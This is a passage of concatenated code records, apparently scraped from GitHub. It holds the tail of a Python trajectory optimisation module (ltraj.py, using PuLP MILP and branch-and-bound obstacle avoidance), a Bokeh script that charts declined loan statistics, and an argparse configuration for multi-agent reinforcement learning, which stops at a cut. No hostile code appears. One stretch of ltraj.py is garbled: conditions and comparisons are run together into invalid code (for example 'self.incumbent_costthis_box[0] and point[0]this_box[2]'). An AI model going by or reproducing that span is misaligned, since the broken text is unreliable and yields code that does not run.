np.dot(-np.array(E), self.avar_x[aa][kk])+np.dot(-np.array(F), self.avar_u[aa][kk])\n ))\n )\n self.objective += newvar\n\n def addStageConstraints(self, C, D, e, agent='aug'):\n # adds Cx(k)+Du(k)<=e to constraints\n for kk in range(self.Nt):\n if agent=='aug':\n self.addVecLessEqZeroConstraint(np.dot(np.array(C), self.var_x[kk])+np.dot(np.array(D), self.var_u[kk])-e)\n elif agent in range(self.num_agents):\n self.addVecLessEqZeroConstraint(np.dot(np.array(C), self.avar_x[agent][kk]) + np.dot(np.array(D), self.avar_u[agent][kk]) - e)\n elif agent=='all':\n for aa in range(self.num_agents):\n self.addVecLessEqZeroConstraint(np.dot(np.array(C), self.avar_x[aa][kk]) + np.dot(np.array(D), self.avar_u[aa][kk]) - e)\n\n def add2NormStageCost(self,E,F,Nc=20):\n # adds sum_k ||Ex(k)+Fu(k)||_2 to cost\n # where E and F must both have two rows\n # approximated by Nc linear constraints\n M = np.transpose(np.vstack((np.cos(np.pi*np.array(range(Nc))/Nc),np.sin(np.pi*np.array(range(Nc))/Nc))))\n self.addInfNormStageCost(np.dot(M,E),np.dot(M,F))\n\n def add2Norm3DStageCost(self,E,F,Naz=11,Nel=7):\n # adds sum_k ||Ex(k)+Fu(k)||_2 to cost\n # where E and F must both have THREE rows\n # approximated by 2*Naz*Nel linear constraints\n M = pointsOnHemisphere(Nel,Naz)\n self.addInfNormStageCost(np.dot(M,E),np.dot(M,F))\n\n def plotStateHistory(self):\n for ii in range(self.num_states):\n plt.plot([x[ii].varValue for x in self.var_x])\n plt.grid()\n plt.show()\n\n def plotStateControlHistory(self):\n plt.subplot(2,1,1)\n for ii in range(self.num_states):\n plt.plot([x[ii].varValue for x in self.var_x],'-x')\n plt.grid()\n plt.subplot(2,1,2)\n for ii in range(self.num_inputs):\n plt.plot([u[ii].varValue for u in self.var_u],'-x')\n plt.grid()\n plt.show()\n\ndef mutliTest3(num_agents):\n A = np.eye(2)\n B = np.array([[1],[1]])\n lt = LTraj(A,B,5,num_agents=num_agents)\n return lt\n\nclass UnionConstraint:\n \n def __init__(self,c,seq=100,name=None):\n self.name = name\n self.seq = seq\n self.cons = c\n \n def __repr__(self):\n or_sep = '\\n OR\\n '\n and_sep = '\\n '\n rep = ('\\n' + self.name + ':\\n{\\n ' +\n or_sep.join([and_sep.join([repr(f) for f in e]) for e in self.cons]) +\n '\\n}')\n return rep\n \n def convertToMILP(self,M,bin_name):\n # constraint list\n con_list = []\n # number of regions\n Nr = len(self.cons)\n # expression for final binary constraint\n bin_con = 0.0\n for ii in range(Nr):\n this_region_exp = self.cons[ii]\n # new binary dec var\n new_bin = pulp.LpVariable(\"%s_%i\" % (bin_name,ii),cat='Binary')\n # new constraint for each inequality defining the region\n for cc in this_region_exp:\n con_list.append(cc-M*new_bin<=0)\n # add the binary to the logic constraint\n bin_con += new_bin\n # add the logical constraint\n con_list.append(bin_con <= (Nr-1))\n return con_list\n\nclass LpProbUnionCons(LpProbVectors):\n\n def __init__(self,name=\"NoName\",sense=1,presolver=None):\n # initialize parent Pulp class\n LpProbVectors.__init__(self, name, sense)\n # and set list of union constraints to zero\n self.union_cons = []\n # identify incompatible combinations early\n self.taboo_list = []\n # store solver early if given\n self.presolver = presolver\n # flag if converted to MILP already\n self.has_been_MILPed = False\n\n def addUnionConstraint(self,c,seq=100,name=None):\n # c should be a tuple of vector expressions\n # constraint x in union{c[0]<=0, c[1]<=0, ...}\n # elements do not have to be same size\n if name is None:\n name = (\"_union%i\" % (1+len(self.union_cons)))\n 
self.union_cons.append(UnionConstraint(c,seq,name))\n \n def delUnionConstraint(self,ii):\n del self.union_cons[ii]\n \n def delUnionConByName(self,name):\n try:\n print(\"Deleting union constraint %s.\" % name)\n names = [c.names for c in self.union_cons]\n ii = names.index(name)\n self.delUnionConstraint(ii)\n except ValueError:\n print(\"Can't find union constraint with name %s.\" % name)\n\n def __repr__(self):\n repr1 = LpProbVectors.__repr__(self)\n union_sep = '\\n'\n repr2 = \"\\nUNIONS\\n\" + union_sep.join([repr(c) for c in self.union_cons]) \n return(repr1+repr2)\n\n def _getNextNode(self,strategy='depth'):\n if strategy=='depth':\n # depth first search \n node = self.node_list.pop()\n elif strategy=='breadth':\n # breadth first search\n node = self.node_list.pop(0)\n elif strategy=='best_bound':\n bound_list = [n.lower_bound for n in self.node_list]\n best_idx = np.argmin(bound_list)\n node = self.node_list.pop(best_idx)\n elif strategy=='least_infeas':\n infeas_list = [n.infeas for n in self.node_list]\n best_idx = np.argmin(infeas_list)\n node = self.node_list.pop(best_idx)\n elif strategy=='random_hybrid':\n # choose randomly between depth and breadth\n if np.random.uniform()>0.5:\n # depth\n node = self.node_list.pop()\n else:\n # breadth\n node = self.node_list.pop(0)\n else:\n # default back to depth first \n node = self.node_list.pop()\n return(node)\n\n def _solInUnionRegion(self,r):\n v = self.vectorValue(r)\n if np.max(v)<=0.0:\n flag_reg = True\n else:\n flag_reg = False\n return flag_reg\n\n def _unionConSatisfied(self,c):\n flag_sat = False\n for r in c:\n if self._solInUnionRegion(r):\n flag_sat = True\n break\n return flag_sat\n\n def _unionFeasible(self):\n flag_feas = True\n for ci,cc in enumerate(self.union_cons):\n if self._unionConSatisfied(cc):\n continue\n else:\n flag_feas = False\n self.first_violated_union = cc\n self.first_violated_index = ci\n break\n return flag_feas\n\n def _childNode(self):\n # first just call the existing deepcopy inheritend from LpProblem\n new_node = LpProbUnionCons(name = self.name, sense = self.sense)\n # and copy the lower bound and the union constraints across\n new_node.union_cons = self.union_cons[:]\n new_node.leq_list = self.leq_list[:]\n new_node.lower_bound = self.lower_bound\n # copy objective\n new_node.objective = self.objective.copy()\n # infeasibility (used later for node selection)\n new_node.infeas = 0\n # copy constraints\n new_node.constraints = self.constraints.copy()\n # note not bothering to copy node list, as only relevant for root\n return new_node\n\n def _branch(self,parent_node):\n parent_node.lower_bound = parent_node.objective.value()\n for rr in parent_node.first_violated_union:\n new_node = parent_node._childNode()\n new_node.union_cons.pop(parent_node.first_violated_index)\n new_node.addVecLessEqZeroConstraint(rr)\n new_node.infeas = np.max(self.vectorValue(rr))\n self.node_list.append(new_node)\n\n def _sort_unions(self):\n # sort by supplied sequence number or priority\n decorated = [(self.union_cons_seqs[i],i) for i in range(len(self.union_cons))]\n decorated.sort()\n self.union_cons = [self.union_cons[i] for (seq,i) in decorated]\n # and sort the sequence list to avoid silliness\n self.union_cons_seqs = [seq for (seq,i) in decorated]\n # and the name list\n self.union_cons_names = [self.union_cons_names[i] for (seq,i) in decorated]\n\n def _status_msg(self,msg):\n if self.verbosity>=10:\n if np.mod(self.lp_count,self.verbosity)==0:\n print(\"%i : %i : %f : %s\" % 
(self.lp_count,len(self.node_list),self.incumbent_cost,msg))\n elif self.verbosity>=1:\n print(\"%i : %i : %f : %s\" % (self.lp_count,len(self.node_list),self.incumbent_cost,msg))\n\n def solveByBranchBound(self,Nmaxnodes=1000,Nmaxiters=5000,strategy='least_infeas',verbosity=1,**kwargs):\n print(\"Branch and bound solver needs updating for new UnionConstraint method\")\n assert(1<0) # stop before it gets any worse!\n start_time = time.clock()\n # no lower bound yet\n self.lower_bound = -np.inf\n # initialize the node list with root ULP\n self.node_list=[self._childNode()]\n # incumbent\n self.incumbent_cost=np.inf\n # count number of actual solves\n self.lp_count = 0\n # sort the union constraints for efficiency\n self._sort_unions()\n # store verbosity setting\n self.verbosity = verbosity\n # loop\n for nn in range(Nmaxiters):\n if len(self.node_list)==0:\n # finished - no more nodes\n self.status=1\n self._status_msg(\"OPTIMAL no more nodes\")\n break\n if self.lp_count==Nmaxnodes:\n # finished - no more nodes\n self.status=0\n self._status_msg(\"Node LP count limit reached\")\n break\n this_node = self._getNextNode(strategy)\n if this_node.lower_bound >= self.incumbent_cost:\n # fathomed as can't improve\n self._status_msg(\"Fathom before solving bound=%f\" % (this_node.lower_bound))\n continue\n # check for contradictory constraints\n if this_node.contradictory:\n # fathomed as won't solve\n self._status_msg(\"Fathom due to incompatible bounds\")\n continue\n # solve the LP\n # with unhandled arguments passed to solver\n self.lp_count += 1\n this_node.solve(**kwargs)\n if this_node.status < 0:\n # fathomed as infeasible\n self._status_msg(\"Fathom infeasible status=%i\" % (this_node.status))\n continue\n if this_node.objective.value() >= self.incumbent_cost:\n # fathomed as did not improve\n self._status_msg(\"Fathom after solving cost=%f\" % (this_node.objective.value()))\n continue\n if this_node._unionFeasible():\n # awesome - this is my new incumbent\n self.incumbent_cost = this_node.objective.value()\n self.incumbent_node = this_node\n self.incumbent_sol = [vv.varValue for vv in this_node.variables()]\n self._status_msg(\"New incumbent %f\" % (this_node.objective.value()))\n else:\n self._branch(this_node)\n self._status_msg(\"Branched with bound=%f\" % (this_node.objective.value()))\n else:\n self.status=0\n self._status_msg(\"Iteration limit reached\")\n # if ever found solution\n if self.incumbent_costthis_box[0] and point[0]this_box[2] and point[1]this_box[0]\n assert this_box[3]>this_box[2]\n assert this_box[5]>this_box[4]\n self.addStatic3DObst(this_box[0],this_box[1],this_box[2],this_box[3],this_box[4],this_box[5])\n\n def plotBoxes(self,ax):\n for this_box in self.boxes:\n ax.plot([this_box[0],this_box[0],this_box[1],this_box[1],this_box[0]],\n [this_box[2],this_box[3],this_box[3],this_box[2],this_box[2]],\n [this_box[4],this_box[4],this_box[4],this_box[4],this_box[4]],\n 'r')\n ax.plot([this_box[0],this_box[0],this_box[1],this_box[1],this_box[0]],\n [this_box[2],this_box[3],this_box[3],this_box[2],this_box[2]],\n [this_box[5],this_box[5],this_box[5],this_box[5],this_box[5]],\n 'r')\n ax.plot([this_box[0],this_box[0]],\n [this_box[2],this_box[2]],\n [this_box[4],this_box[5]],\n 'r')\n ax.plot([this_box[1],this_box[1]],\n [this_box[2],this_box[2]],\n [this_box[4],this_box[5]],\n 'r')\n ax.plot([this_box[0],this_box[0]],\n [this_box[3],this_box[3]],\n [this_box[4],this_box[5]],\n 'r')\n ax.plot([this_box[1],this_box[1]],\n [this_box[3],this_box[3]],\n 
[this_box[4],this_box[5]],\n 'r')\n\n def plotTraj3D(self):\n fig = plt.figure()\n ax = Axes3D(fig)\n self.plotBoxes(ax)\n ax.plot([x[self.ind_x].varValue for x in self.var_x],\n [x[self.ind_y].varValue for x in self.var_x],\n [x[self.ind_z].varValue for x in self.var_x])\n if self.term_x:\n ax.plot([self.term_x[self.ind_x]],\n [self.term_x[self.ind_y]],\n [self.term_x[self.ind_z]], 'g*')\n if self.init_x:\n ax.plot([self.init_x[self.ind_x]],\n [self.init_x[self.ind_y]],\n [self.init_x[self.ind_z]], 'gs')\n plt.show()\n\nclass LTr3DShortest(LTraj3DAvoid):\n\n def __init__(self,Nt,name=\"Trajectory\"):\n A = np.eye(3)\n B = np.eye(3)\n LTraj3DAvoid.__init__(self,A,B,Nt,name=name,sense=1)\n self.add2Norm3DStageCost(np.zeros((3,3)),np.eye(3))\n\ndef unionTest():\n lt = LpProbUnionCons()\n x = pulp.LpVariable(\"x\")\n y = pulp.LpVariable(\"y\")\n lt += -x+y\n r1=[x+1,-2-x,y-2,1-y]\n r2=[x+3,-4-x,y-2,1-y]\n lt.addUnionConstraint((r1,r2))\n lt.solveByMILP()\n return lt\n\ndef ltrajTest2():\n A = np.eye(2)\n B = np.eye(2)\n lt = LTraj(A,B,5)\n lt.setInitialState([2.0,3.0])\n lt.setTerminalState([4.0,4.0])\n #lt.addInfNormStageCost(np.zeros((2,2)),np.eye(2))\n lt.add2NormStageCost(np.zeros((2,2)),np.eye(2))\n lt.addConstraint(lt.var_x[2][0]>=5.5)\n #lt.addInfNormStageCost(np.eye(2),np.zeros((2,2)))\n lt.solve()\n lt.plotStateHistory()\n lt.plotTraj2D()\n return lt\n\ndef lavTest():\n A = np.eye(2)\n B = np.eye(2)\n lt = LTrajAvoid(A,B,5)\n lt.setInitialState([2.0,3.0])\n lt.setTerminalState([8.0,4.0])\n #lt.addInfNormStageCost(np.zeros((2,2)),np.eye(2))\n lt.add2NormStageCost(np.zeros((2,2)),np.eye(2),Nc=11)\n lt.addStatic2DObst(2.5,3.5,1.5,4.5)\n lt.addStatic2DObst(5.5,6.5,3.5,7.5)\n return lt\n\ndef bbTest():\n lt = lavTest()\n if pulp.GUROBI().available():\n # solve by Gurobi, if installed\n lt.solveByBranchBound(solver=pulp.GUROBI(msg=0))\n else:\n print(\"Could not find Gurobi - trying built-in solver\")\n # or solve by PuLP default built-in solver\n lt.solveByBranchBound()\n lt.plotTraj2D()\n return lt\n\ndef milpTest():\n lt = lavTest()\n if pulp.GUROBI().available():\n # solve by Gurobi, if installed\n lt.solveByMILP(solver=pulp.GUROBI())\n else:\n print(\"Could not find Gurobi - trying built-in solver\")\n # or solve by PuLP default built-in solver\n lt.solveByMILP()\n lt.plotTraj2D()\n return lt\n\ndef randomTest(num_boxes=3,method='MILP',**kwargs):\n A = np.eye(2)\n B = np.eye(2)\n lt = LTraj2DAvoid(A,B,5)\n lt.setInitialState([0.0,0.0])\n lt.setTerminalState([10.0,10.0])\n lt.add2NormStageCost(np.zeros((2,2)),np.eye(2))\n box_ctrs = np.random.uniform(low=2.0,high=8.0,size=(num_boxes,2))\n box_sizes = np.random.uniform(low=0.1,high=0.75,size=(num_boxes,2))\n plt.cla()\n for bb in range(num_boxes):\n this_box = (box_ctrs[bb,0]-box_sizes[bb,0],\n box_ctrs[bb,0]+box_sizes[bb,0],\n box_ctrs[bb,1]-box_sizes[bb,1],\n box_ctrs[bb,1]+box_sizes[bb,1])\n assert this_box[1]>this_box[0]\n assert this_box[3]>this_box[2]\n lt.addStatic2DObst(this_box[0],this_box[1],this_box[2],this_box[3])\n # solve it\n if method=='MILP':\n lt.solveByMILP(**kwargs)\n lt.plotTraj2D()\n elif method=='BNB':\n lt.solveByBranchBound(**kwargs)\n lt.plotTraj2D()\n return lt\n\ndef randomTest3D(num_boxes=3,method='MILP',**kwargs):\n A = np.eye(3)\n B = np.eye(3)\n lt = LTraj3DAvoid(A,B,5)\n lt.setInitialState([0.0,0.0,0.0])\n lt.setTerminalState([10.0,10.0,10.0])\n lt.add2Norm3DStageCost(np.zeros((3,3)),np.eye(3))\n box_ctrs = np.random.uniform(low=2.0,high=8.0,size=(num_boxes,3))\n box_sizes = 
np.random.uniform(low=0.1,high=0.75,size=(num_boxes,3))\n for bb in range(num_boxes):\n this_box = (box_ctrs[bb,0]-box_sizes[bb,0],\n box_ctrs[bb,0]+box_sizes[bb,0],\n box_ctrs[bb,1]-box_sizes[bb,1],\n box_ctrs[bb,1]+box_sizes[bb,1],\n box_ctrs[bb,2]-box_sizes[bb,2],\n box_ctrs[bb,2]+box_sizes[bb,2])\n assert this_box[1]>this_box[0]\n assert this_box[3]>this_box[2]\n assert this_box[5]>this_box[4]\n lt.addStatic3DObst(this_box[0],this_box[1],this_box[2],this_box[3],this_box[4],this_box[5])\n # solve it\n if method=='MILP':\n lt.solveByMILP(**kwargs)\n lt.plotTraj3D()\n elif method=='BNB':\n lt.solveByBranchBound(**kwargs)\n lt.plotTraj3D()\n return lt\n\ndef random3DShortest(Nt=5,num_boxes=10,ctr_range=(2.0,8.0),size_range=(0.1,3.0),method='MILP',**kwargs):\n lt = LTr3DShortest(Nt=5)\n lt.setInitialState([0.0,0.0,0.0])\n lt.setTerminalState([10.0,10.0,10.0])\n lt.addRandomBoxes(num_boxes,ctr_range,size_range)\n # solve it\n if method=='MILP':\n lt.solveByMILP(**kwargs)\n lt.plotTraj3D()\n elif method=='BNB':\n lt.solveByBranchBound(**kwargs)\n lt.plotTraj3D()\n return lt\n\nif __name__==\"__main__\":\n randomTest(num_boxes=8,method='MILP')\n","repo_name":"arthurrichards77/pytro","sub_path":"ltraj.py","file_name":"ltraj.py","file_ext":"py","file_size_in_byte":29996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31202755449","text":"# A program to visualize declined loan data using Pandas and Bokeh\r\n# The data files can be downloaded at \"DECLINED LOAN DATA\" section on https://www.lendingclub.com/info/download-data.action\r\n# The program runs on Bokeh server: open Anaconda Prompt, go to the folder containing the code file, type bokeh serve --show Reject_stats.py and enter\r\n\r\nimport pandas as pd\r\nfrom bokeh.io import curdoc\r\nfrom bokeh.plotting import figure\r\nfrom bokeh.models import ColumnDataSource, Select, LinearColorMapper, HoverTool, BoxSelectTool, Slider, LabelSet\r\nfrom bokeh.palettes import Viridis256\r\nfrom bokeh.layouts import row, column\r\n\r\ndef update_y(attr, old, new): # a function to update y-axis of a chart\r\n med = all_data[all_data['Application Date'].dt.year == slider1.value].groupby(['Employment Length'])[y_sel.value].mean().round(4)\r\n med = med.sort_values(ascending=False)\r\n p_med.yaxis.axis_label = y_sel.value\r\n p_med.x_range.factors = list(med.index)\r\n medCDS.data = dict(x=med.index, y=med.values)\r\n \r\ndef update_x(attr, old, new): # a function to update x-axis of a chart\r\n cnt = all_data[all_data['Application Date'].dt.year == slider2.value].groupby(x_sel.value)[x_sel.value].count()\r\n cnt = cnt.sort_values(ascending=False)\r\n p_cnt.xaxis.axis_label = x_sel.value\r\n \r\n if(cnt.count())>=20:\r\n temp = cnt.nlargest(20) # display 20 largest categories at most on x-axis\r\n p_cnt.x_range.factors = list(temp.index)\r\n cntCDS.data = dict(x=temp.index, y=temp.values)\r\n else:\r\n p_cnt.x_range.factors = list(cnt.index)\r\n cntCDS.data = dict(x=cnt.index, y=cnt.values)\r\n\r\n# put the data files in the same folder as the code file (for simplicity reasons)\r\n# read the data into Pandas, skip the first rwo, parse 'Application Date' as date format\r\nd0 = pd.read_csv('RejectStatsA.csv', skiprows=[0], parse_dates=['Application Date']) # 2007-2012 data\r\nd1 = pd.read_csv('RejectStatsB.csv', skiprows=[0], parse_dates=['Application Date']) # 2013-2014 data\r\nd2 = pd.read_csv('RejectStatsD.csv', skiprows=[0], parse_dates=['Application Date']) # 2015 data\r\nd3 = 
pd.read_csv('RejectStats_2016Q1.csv', skiprows=[0], parse_dates=['Application Date']) # 2016 Q1 data\r\nd4 = pd.read_csv('RejectStats_2016Q2.csv', skiprows=[0], parse_dates=['Application Date']) # 2016 Q2 data\r\nd5 = pd.read_csv('RejectStats_2016Q3.csv', skiprows=[0], parse_dates=['Application Date']) # 2016 Q3 data\r\nd6 = pd.read_csv('RejectStats_2016Q4.csv', skiprows=[0], parse_dates=['Application Date']) # 2016 Q4 data\r\nd7 = pd.read_csv('RejectStats_2017Q1.csv', skiprows=[0], parse_dates=['Application Date']) # 2017 Q1 data\r\nd8 = pd.read_csv('RejectStats_2017Q2.csv', skiprows=[0], parse_dates=['Application Date']) # 2017 Q2 data\r\nd9 = pd.read_csv('RejectStats_2017Q3.csv', skiprows=[0], parse_dates=['Application Date']) # 2017 Q3 data\r\n# union data\r\nall_data = pd.concat([d0,d1,d2,d3,d4,d5,d6,d7,d8,d9], ignore_index=True)\r\n\r\n# convert Percent(object) to Float\r\nall_data['Debt-To-Income Ratio'] = all_data['Debt-To-Income Ratio'].replace('%','',regex=True).astype('float')/100\r\n\r\n# add two selection widgets\r\ny_sel = Select(title='Y Axis:', options=['Amount Requested','Debt-To-Income Ratio'], value='Amount Requested')\r\nx_sel = Select(title='X Axis:', options=['Employment Length', 'Loan Title'], value='Employment Length')\r\n\r\n# add two sliders\r\nslider1 = Slider(title=\"Select above one year\", start = all_data['Application Date'].dt.year.min(), end = all_data['Application Date'].dt.year.max(), \r\n value = all_data['Application Date'].dt.year.min(), step=1)\r\nslider2 = Slider(title=\"Select above one year\", start = all_data['Application Date'].dt.year.min(), end = all_data['Application Date'].dt.year.max(), \r\n value = all_data['Application Date'].dt.year.min(), step=1)\r\n\r\n# calculate average Amount Requested over the years, display 4 decimal points\r\navg_amt = all_data.groupby('Application Date')['Amount Requested'].mean().round(4)\r\n\r\n# calculate average Debt-To-Income Ratio, display 4 decimal points\r\navg_ratio = all_data.groupby('Application Date')['Debt-To-Income Ratio'].mean().round(4)\r\n\r\n# calculate average based on slider value and sort, display 4 decimal points\r\nmed = all_data[all_data['Application Date'].dt.year == slider1.value].groupby(['Employment Length'])[y_sel.value].mean().round(4)\r\nmed = med.sort_values(ascending=False)\r\n\r\n# calculate counts based on slider value and sort, display 4 decimal points\r\ncnt = all_data[all_data['Application Date'].dt.year == slider2.value].groupby(x_sel.value)[x_sel.value].count()\r\ncnt = cnt.sort_values(ascending=False)\r\n\r\n# put into Column Data Source for faster and easier visualization\r\navg_amtCDS = ColumnDataSource(data=dict(x=avg_amt.index, y=avg_amt.values))\r\navg_ratioCDS = ColumnDataSource(data=dict(x=avg_ratio.index, y=avg_ratio.values))\r\nmedCDS = ColumnDataSource(data=dict(x=med.index, y=med.values))\r\ncntCDS = ColumnDataSource(data=dict(x=cnt.index, y=cnt.values))\r\n\r\n# create figure 1, add tools, time series chart\r\np_amt = figure(title='Trend of Average Amount Requested (Declined)', x_axis_label='Application Date', y_axis_label='Average Amount Requested', \r\n x_axis_type=\"datetime\", plot_width=600, plot_height=300)\r\np_amt.add_tools(BoxSelectTool(), HoverTool(tooltips=[('Average Amount','$y{1.11}')])) \r\np_amt.line('x', 'y', color='blue', legend='Average Amount Requested (Declined)', source=avg_amtCDS)\r\n\r\n# create figure 2, add tools, time series chart\r\np_ratio = figure(title='Trend of Average Debt-To-Income Ratio', x_axis_label='Application Date', 
y_axis_label='Average Debt-To-Income Ratio',\r\n x_axis_type=\"datetime\", plot_width=600, plot_height=300) # y_range=(0,200), y_range=(0,10)\r\np_ratio.add_tools(BoxSelectTool(), HoverTool(tooltips=[('Average Ratio','$y{1.11}')])) \r\np_ratio.line('x', 'y', color='red', legend='Average Debt-To-Income Ratio', source=avg_ratioCDS)\r\n\r\nViridis256.reverse() # reverse color palettes so that the higher values are in deeper colors\r\n\r\n# create figure 3, add tools, vertical bar chart\r\np_med = figure(title='Average by Employment Length by Year', x_axis_label='Employment Length', x_range = list(med.index), plot_width=600, plot_height=400)\r\np_med.vbar('x', top='y', width=.5, source=medCDS,\r\n color={'field':'y','transform':LinearColorMapper(palette=Viridis256, low=min(med.values), high=max(med.values))})\r\np_med.add_tools(BoxSelectTool(), HoverTool(tooltips=[('Median Amount','$y{1.11}'), ('Employment Length','@x')]))\r\np_med.yaxis.axis_label = y_sel.value\r\n\r\n# create figure 4, add tools, vertical bar chart\r\np_cnt = figure(title='Top 20 Counts by Year', y_axis_label='Count', x_range = list(cnt.index), plot_width=600, plot_height=400)\r\np_cnt.vbar('x', top='y', width=.5, source=cntCDS,\r\n color={'field':'y','transform':LinearColorMapper(palette=Viridis256, low=min(cnt.values), high=max(cnt.values))})\r\np_cnt.add_tools(BoxSelectTool(), HoverTool(tooltips=[('Median count','$y{1.11}'), ('X Value','@x')])) \r\np_cnt.xaxis.major_label_orientation = 45\r\np_cnt.xaxis.axis_label = x_sel.value\r\n\r\n# event triggers for selection widgets and sliders\r\ny_sel.on_change('value',update_y)\r\nx_sel.on_change('value',update_x)\r\nslider1.on_change('value', update_y)\r\nslider2.on_change('value', update_x)\r\n\r\n# add data labels to figure 3 and 4\r\nbarLabels1 = LabelSet(x='x', y='y', text='y', text_font_size='8pt', x_offset=-10, y_offset=2,source=medCDS)\r\nbarLabels2 = LabelSet(x='x', y='y', text='y', text_font_size='8pt', x_offset=-10, y_offset=2,source=cntCDS)\r\np_med.add_layout(barLabels1)\r\np_cnt.add_layout(barLabels2)\r\n\r\n# put into layout and run on Bokeh server\r\nlayout = column(row(p_amt,p_ratio), row(column(row(slider1,y_sel), p_med), column(row(slider2,x_sel), p_cnt)))\r\ncurdoc().add_root(layout)\r\ncurdoc().title = \"Declined Loan Data\"","repo_name":"ShunYaoCodes/declined-loan-data-visualization","sub_path":"reject_stats.py","file_name":"reject_stats.py","file_ext":"py","file_size_in_byte":7868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23385144706","text":"from argparse import ArgumentParser\nimport torch\n\ndef common_args():\n parser = ArgumentParser()\n\n # smac args\n parser.add_argument('--difficulty', type=str, default='7', help='the difficulty of the game')\n parser.add_argument('--game_version', type=str, default='latest', help='the version of the game')\n parser.add_argument('--map', type=str, default='3m', help='the map of the game')\n parser.add_argument('--step_mul', type=int, default=8, help='how many steps to make an action')\n parser.add_argument('--replay_dir', type=str, default='', help='absolute path to save the replay')\n\n # general args\n parser.add_argument(\"--env\", \"-e\", default=\"Switch2-v0\", help=\"set env name\")\n parser.add_argument(\"--n_steps\", \"-ns\", type=int, default=2000000, help=\"set total time steps to run\")\n parser.add_argument(\"--n_episodes\", \"-nep\", type=int, default=1, help=\"set n_episodes\")\n parser.add_argument(\"--epsilon\", \"-eps\", 
default=0.5, help=\"set epsilon value\")\n parser.add_argument('--last_action', type=bool, default=True, help='whether to use the last action to choose action')\n parser.add_argument('--reuse_network', type=bool, default=True, help='whether to use one network for all agents')\n parser.add_argument('--gamma', type=float, default=0.99, help='the discount factor')\n parser.add_argument('--evaluate_epoch', type=int, default=20, help='the number of the epoch to evaluate the agent')\n parser.add_argument('--alg', type=str, default='vdn', help='the algorithm to train the agent')\n parser.add_argument('--optimizer', type=str, default=\"RMS\", help='the optimizer')\n parser.add_argument('--model_dir', type=str, default='./model', help='model directory of the policy')\n parser.add_argument('--result_dir', type=str, default='./result', help='result directory of the policy')\n parser.add_argument('--load_model', type=bool, default=False, help='whether to load the pretrained model')\n parser.add_argument('--learn', type=bool, default=True, help='whether to train the model')\n parser.add_argument('--evaluate_cycle', type=int, default=5000, help='how often to eval the model')\n parser.add_argument('--target_update_cycle', type=int, default=200, help='how often to update the target network')\n parser.add_argument('--save_cycle', type=int, default=3333, help='how often to save the model')\n parser.add_argument('--cuda', type=bool, default=False, help='whether to use the GPU')\n\n # args for the acd framework\n\n parser.add_argument(\"--global_temp\",action=\"store_true\",default=False,help=\"Should we model temperature confounding?\")\n parser.add_argument(\"--dims\", type=int, default=4, help=\"Dimensionality of input.\")\n\n parser.add_argument(\n \"--encoder_hidden\", type=int, default=256, help=\"Number of hidden units.\"\n )\n parser.add_argument(\n \"--decoder_hidden\", type=int, default=256, help=\"Number of hidden units.\"\n )\n parser.add_argument(\n \"--encoder\",\n type=str,\n default=\"mlp\",\n help=\"Type of path encoder model (mlp or cnn).\",\n )\n parser.add_argument(\n \"--decoder\",\n type=str,\n default=\"mlp\",\n help=\"Type of decoder model (mlp, rnn, or sim).\",\n )\n parser.add_argument(\n \"--prior\",\n type=float,\n default=1,\n help=\"Weight for sparsity prior (if == 1, uniform prior is applied)\",\n )\n parser.add_argument(\n \"--edge_types\",\n type=int,\n default=2,\n help=\"Number of different edge-types to model\",\n )\n\n parser.add_argument(\n \"--encoder_dropout\",\n type=float,\n default=0.0,\n help=\"Dropout rate (1 - keep probability).\",\n )\n parser.add_argument(\n \"--decoder_dropout\",\n type=float,\n default=0.0,\n help=\"Dropout rate (1 - keep probability).\",\n )\n\n parser.add_argument(\n \"--no_factor\",\n action=\"store_true\",\n default=False,\n help=\"Disables factor graph model.\",\n )\n\n ### unobserved time-series ###\n parser.add_argument(\n \"--unobserved\",\n type=int,\n default=0,\n help=\"Number of time-series to mask from input.\",\n )\n parser.add_argument(\n \"--model_unobserved\",\n type=int,\n default=0,\n help=\"If 0, use NRI to infer unobserved particle. \"\n \"If 1, removes unobserved from data. \"\n \"If 2, fills empty slot with mean of observed time-series (mean imputation)\",\n )\n parser.add_argument(\n \"--dont_shuffle_unobserved\",\n action=\"store_true\",\n default=False,\n help=\"If true, always mask out last particle in trajectory. 
\"\n \"If false, mask random particle.\",\n )\n parser.add_argument(\n \"--teacher_forcing\",\n type=int,\n default=0,\n help=\"Factor to determine how much true trajectory of \"\n \"unobserved particle should be used to learn prediction.\",\n )\n parser.add_argument(\n \"--load_folder\",\n type=str,\n default=\"\",\n help=\"Where to load pre-trained model if finetuning/evaluating. \"\n + \"Leave empty to train from scratch\",\n )\n\n parser.add_argument(\n \"--GPU_to_use\", type=int, default=None, help=\"GPU to use for training\"\n )\n\n parser.add_argument(\n \"--dont_skip_first\",\n action=\"store_true\",\n default=False,\n help=\"If given as argument, do not skip first edge type in decoder, i.e. it represents no-edge.\",\n )\n\n parser.add_argument(\n \"--dont_use_encoder\",\n action=\"store_true\",\n default=False,\n help=\"If true, replace encoder with distribution to be estimated\",\n )\n\n parser.add_argument(\n \"--lr_decay\",\n type=int,\n default=200,\n help=\"After how epochs to decay LR by a factor of gamma.\",\n )\n \n parser.add_argument(\n \"--temp\", type=float, default=0.5, help=\"Temperature for Gumbel softmax.\"\n )\n\n args = parser.parse_args()\n\n args.num_GPU = 0\n args.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n if args.cuda:\n args.num_GPU = 1 \n\n args.factor = not args.no_factor\n args.skip_first = not args.dont_skip_first\n args.use_encoder = not args.dont_use_encoder\n\n # in accordance to acd framework\n if \"PredatorPrey\" in args.env:\n args.timesteps = 100\n args.dims = 25 \n args.num_atoms = 6\n\n if \"Lumberjacks\" in args.env:\n args.timesteps = 100 \n args.dims = 18 \n args.num_atoms = 5\n\n if \"3m\" in args.env:\n args.timesteps = 60 \n args.dims = 1 \n args.num_atoms = 4\n\n return args\n\n\ndef config_args(args):\n\t# buffer/batch sizes\n\targs.batch_size = 32\n\targs.buffer_size = int(5e3)\n\t\n\t#epsilon args for vdn\n\targs.epsilon = 1\n\targs.min_epsilon = 0.05\n\tanneal_steps = 50000\n\targs.anneal_epsilon = (args.epsilon - args.min_epsilon) / anneal_steps\n\targs.epsilon_anneal_scale = 'step'\n\n\t# network\n\targs.rnn_hidden_dim = 64\n\targs.lr = 5e-4\n\n\t# train steps\n\targs.train_steps = 1\n\n\t# prevent gradient explosion\n\targs.grad_norm_clip = 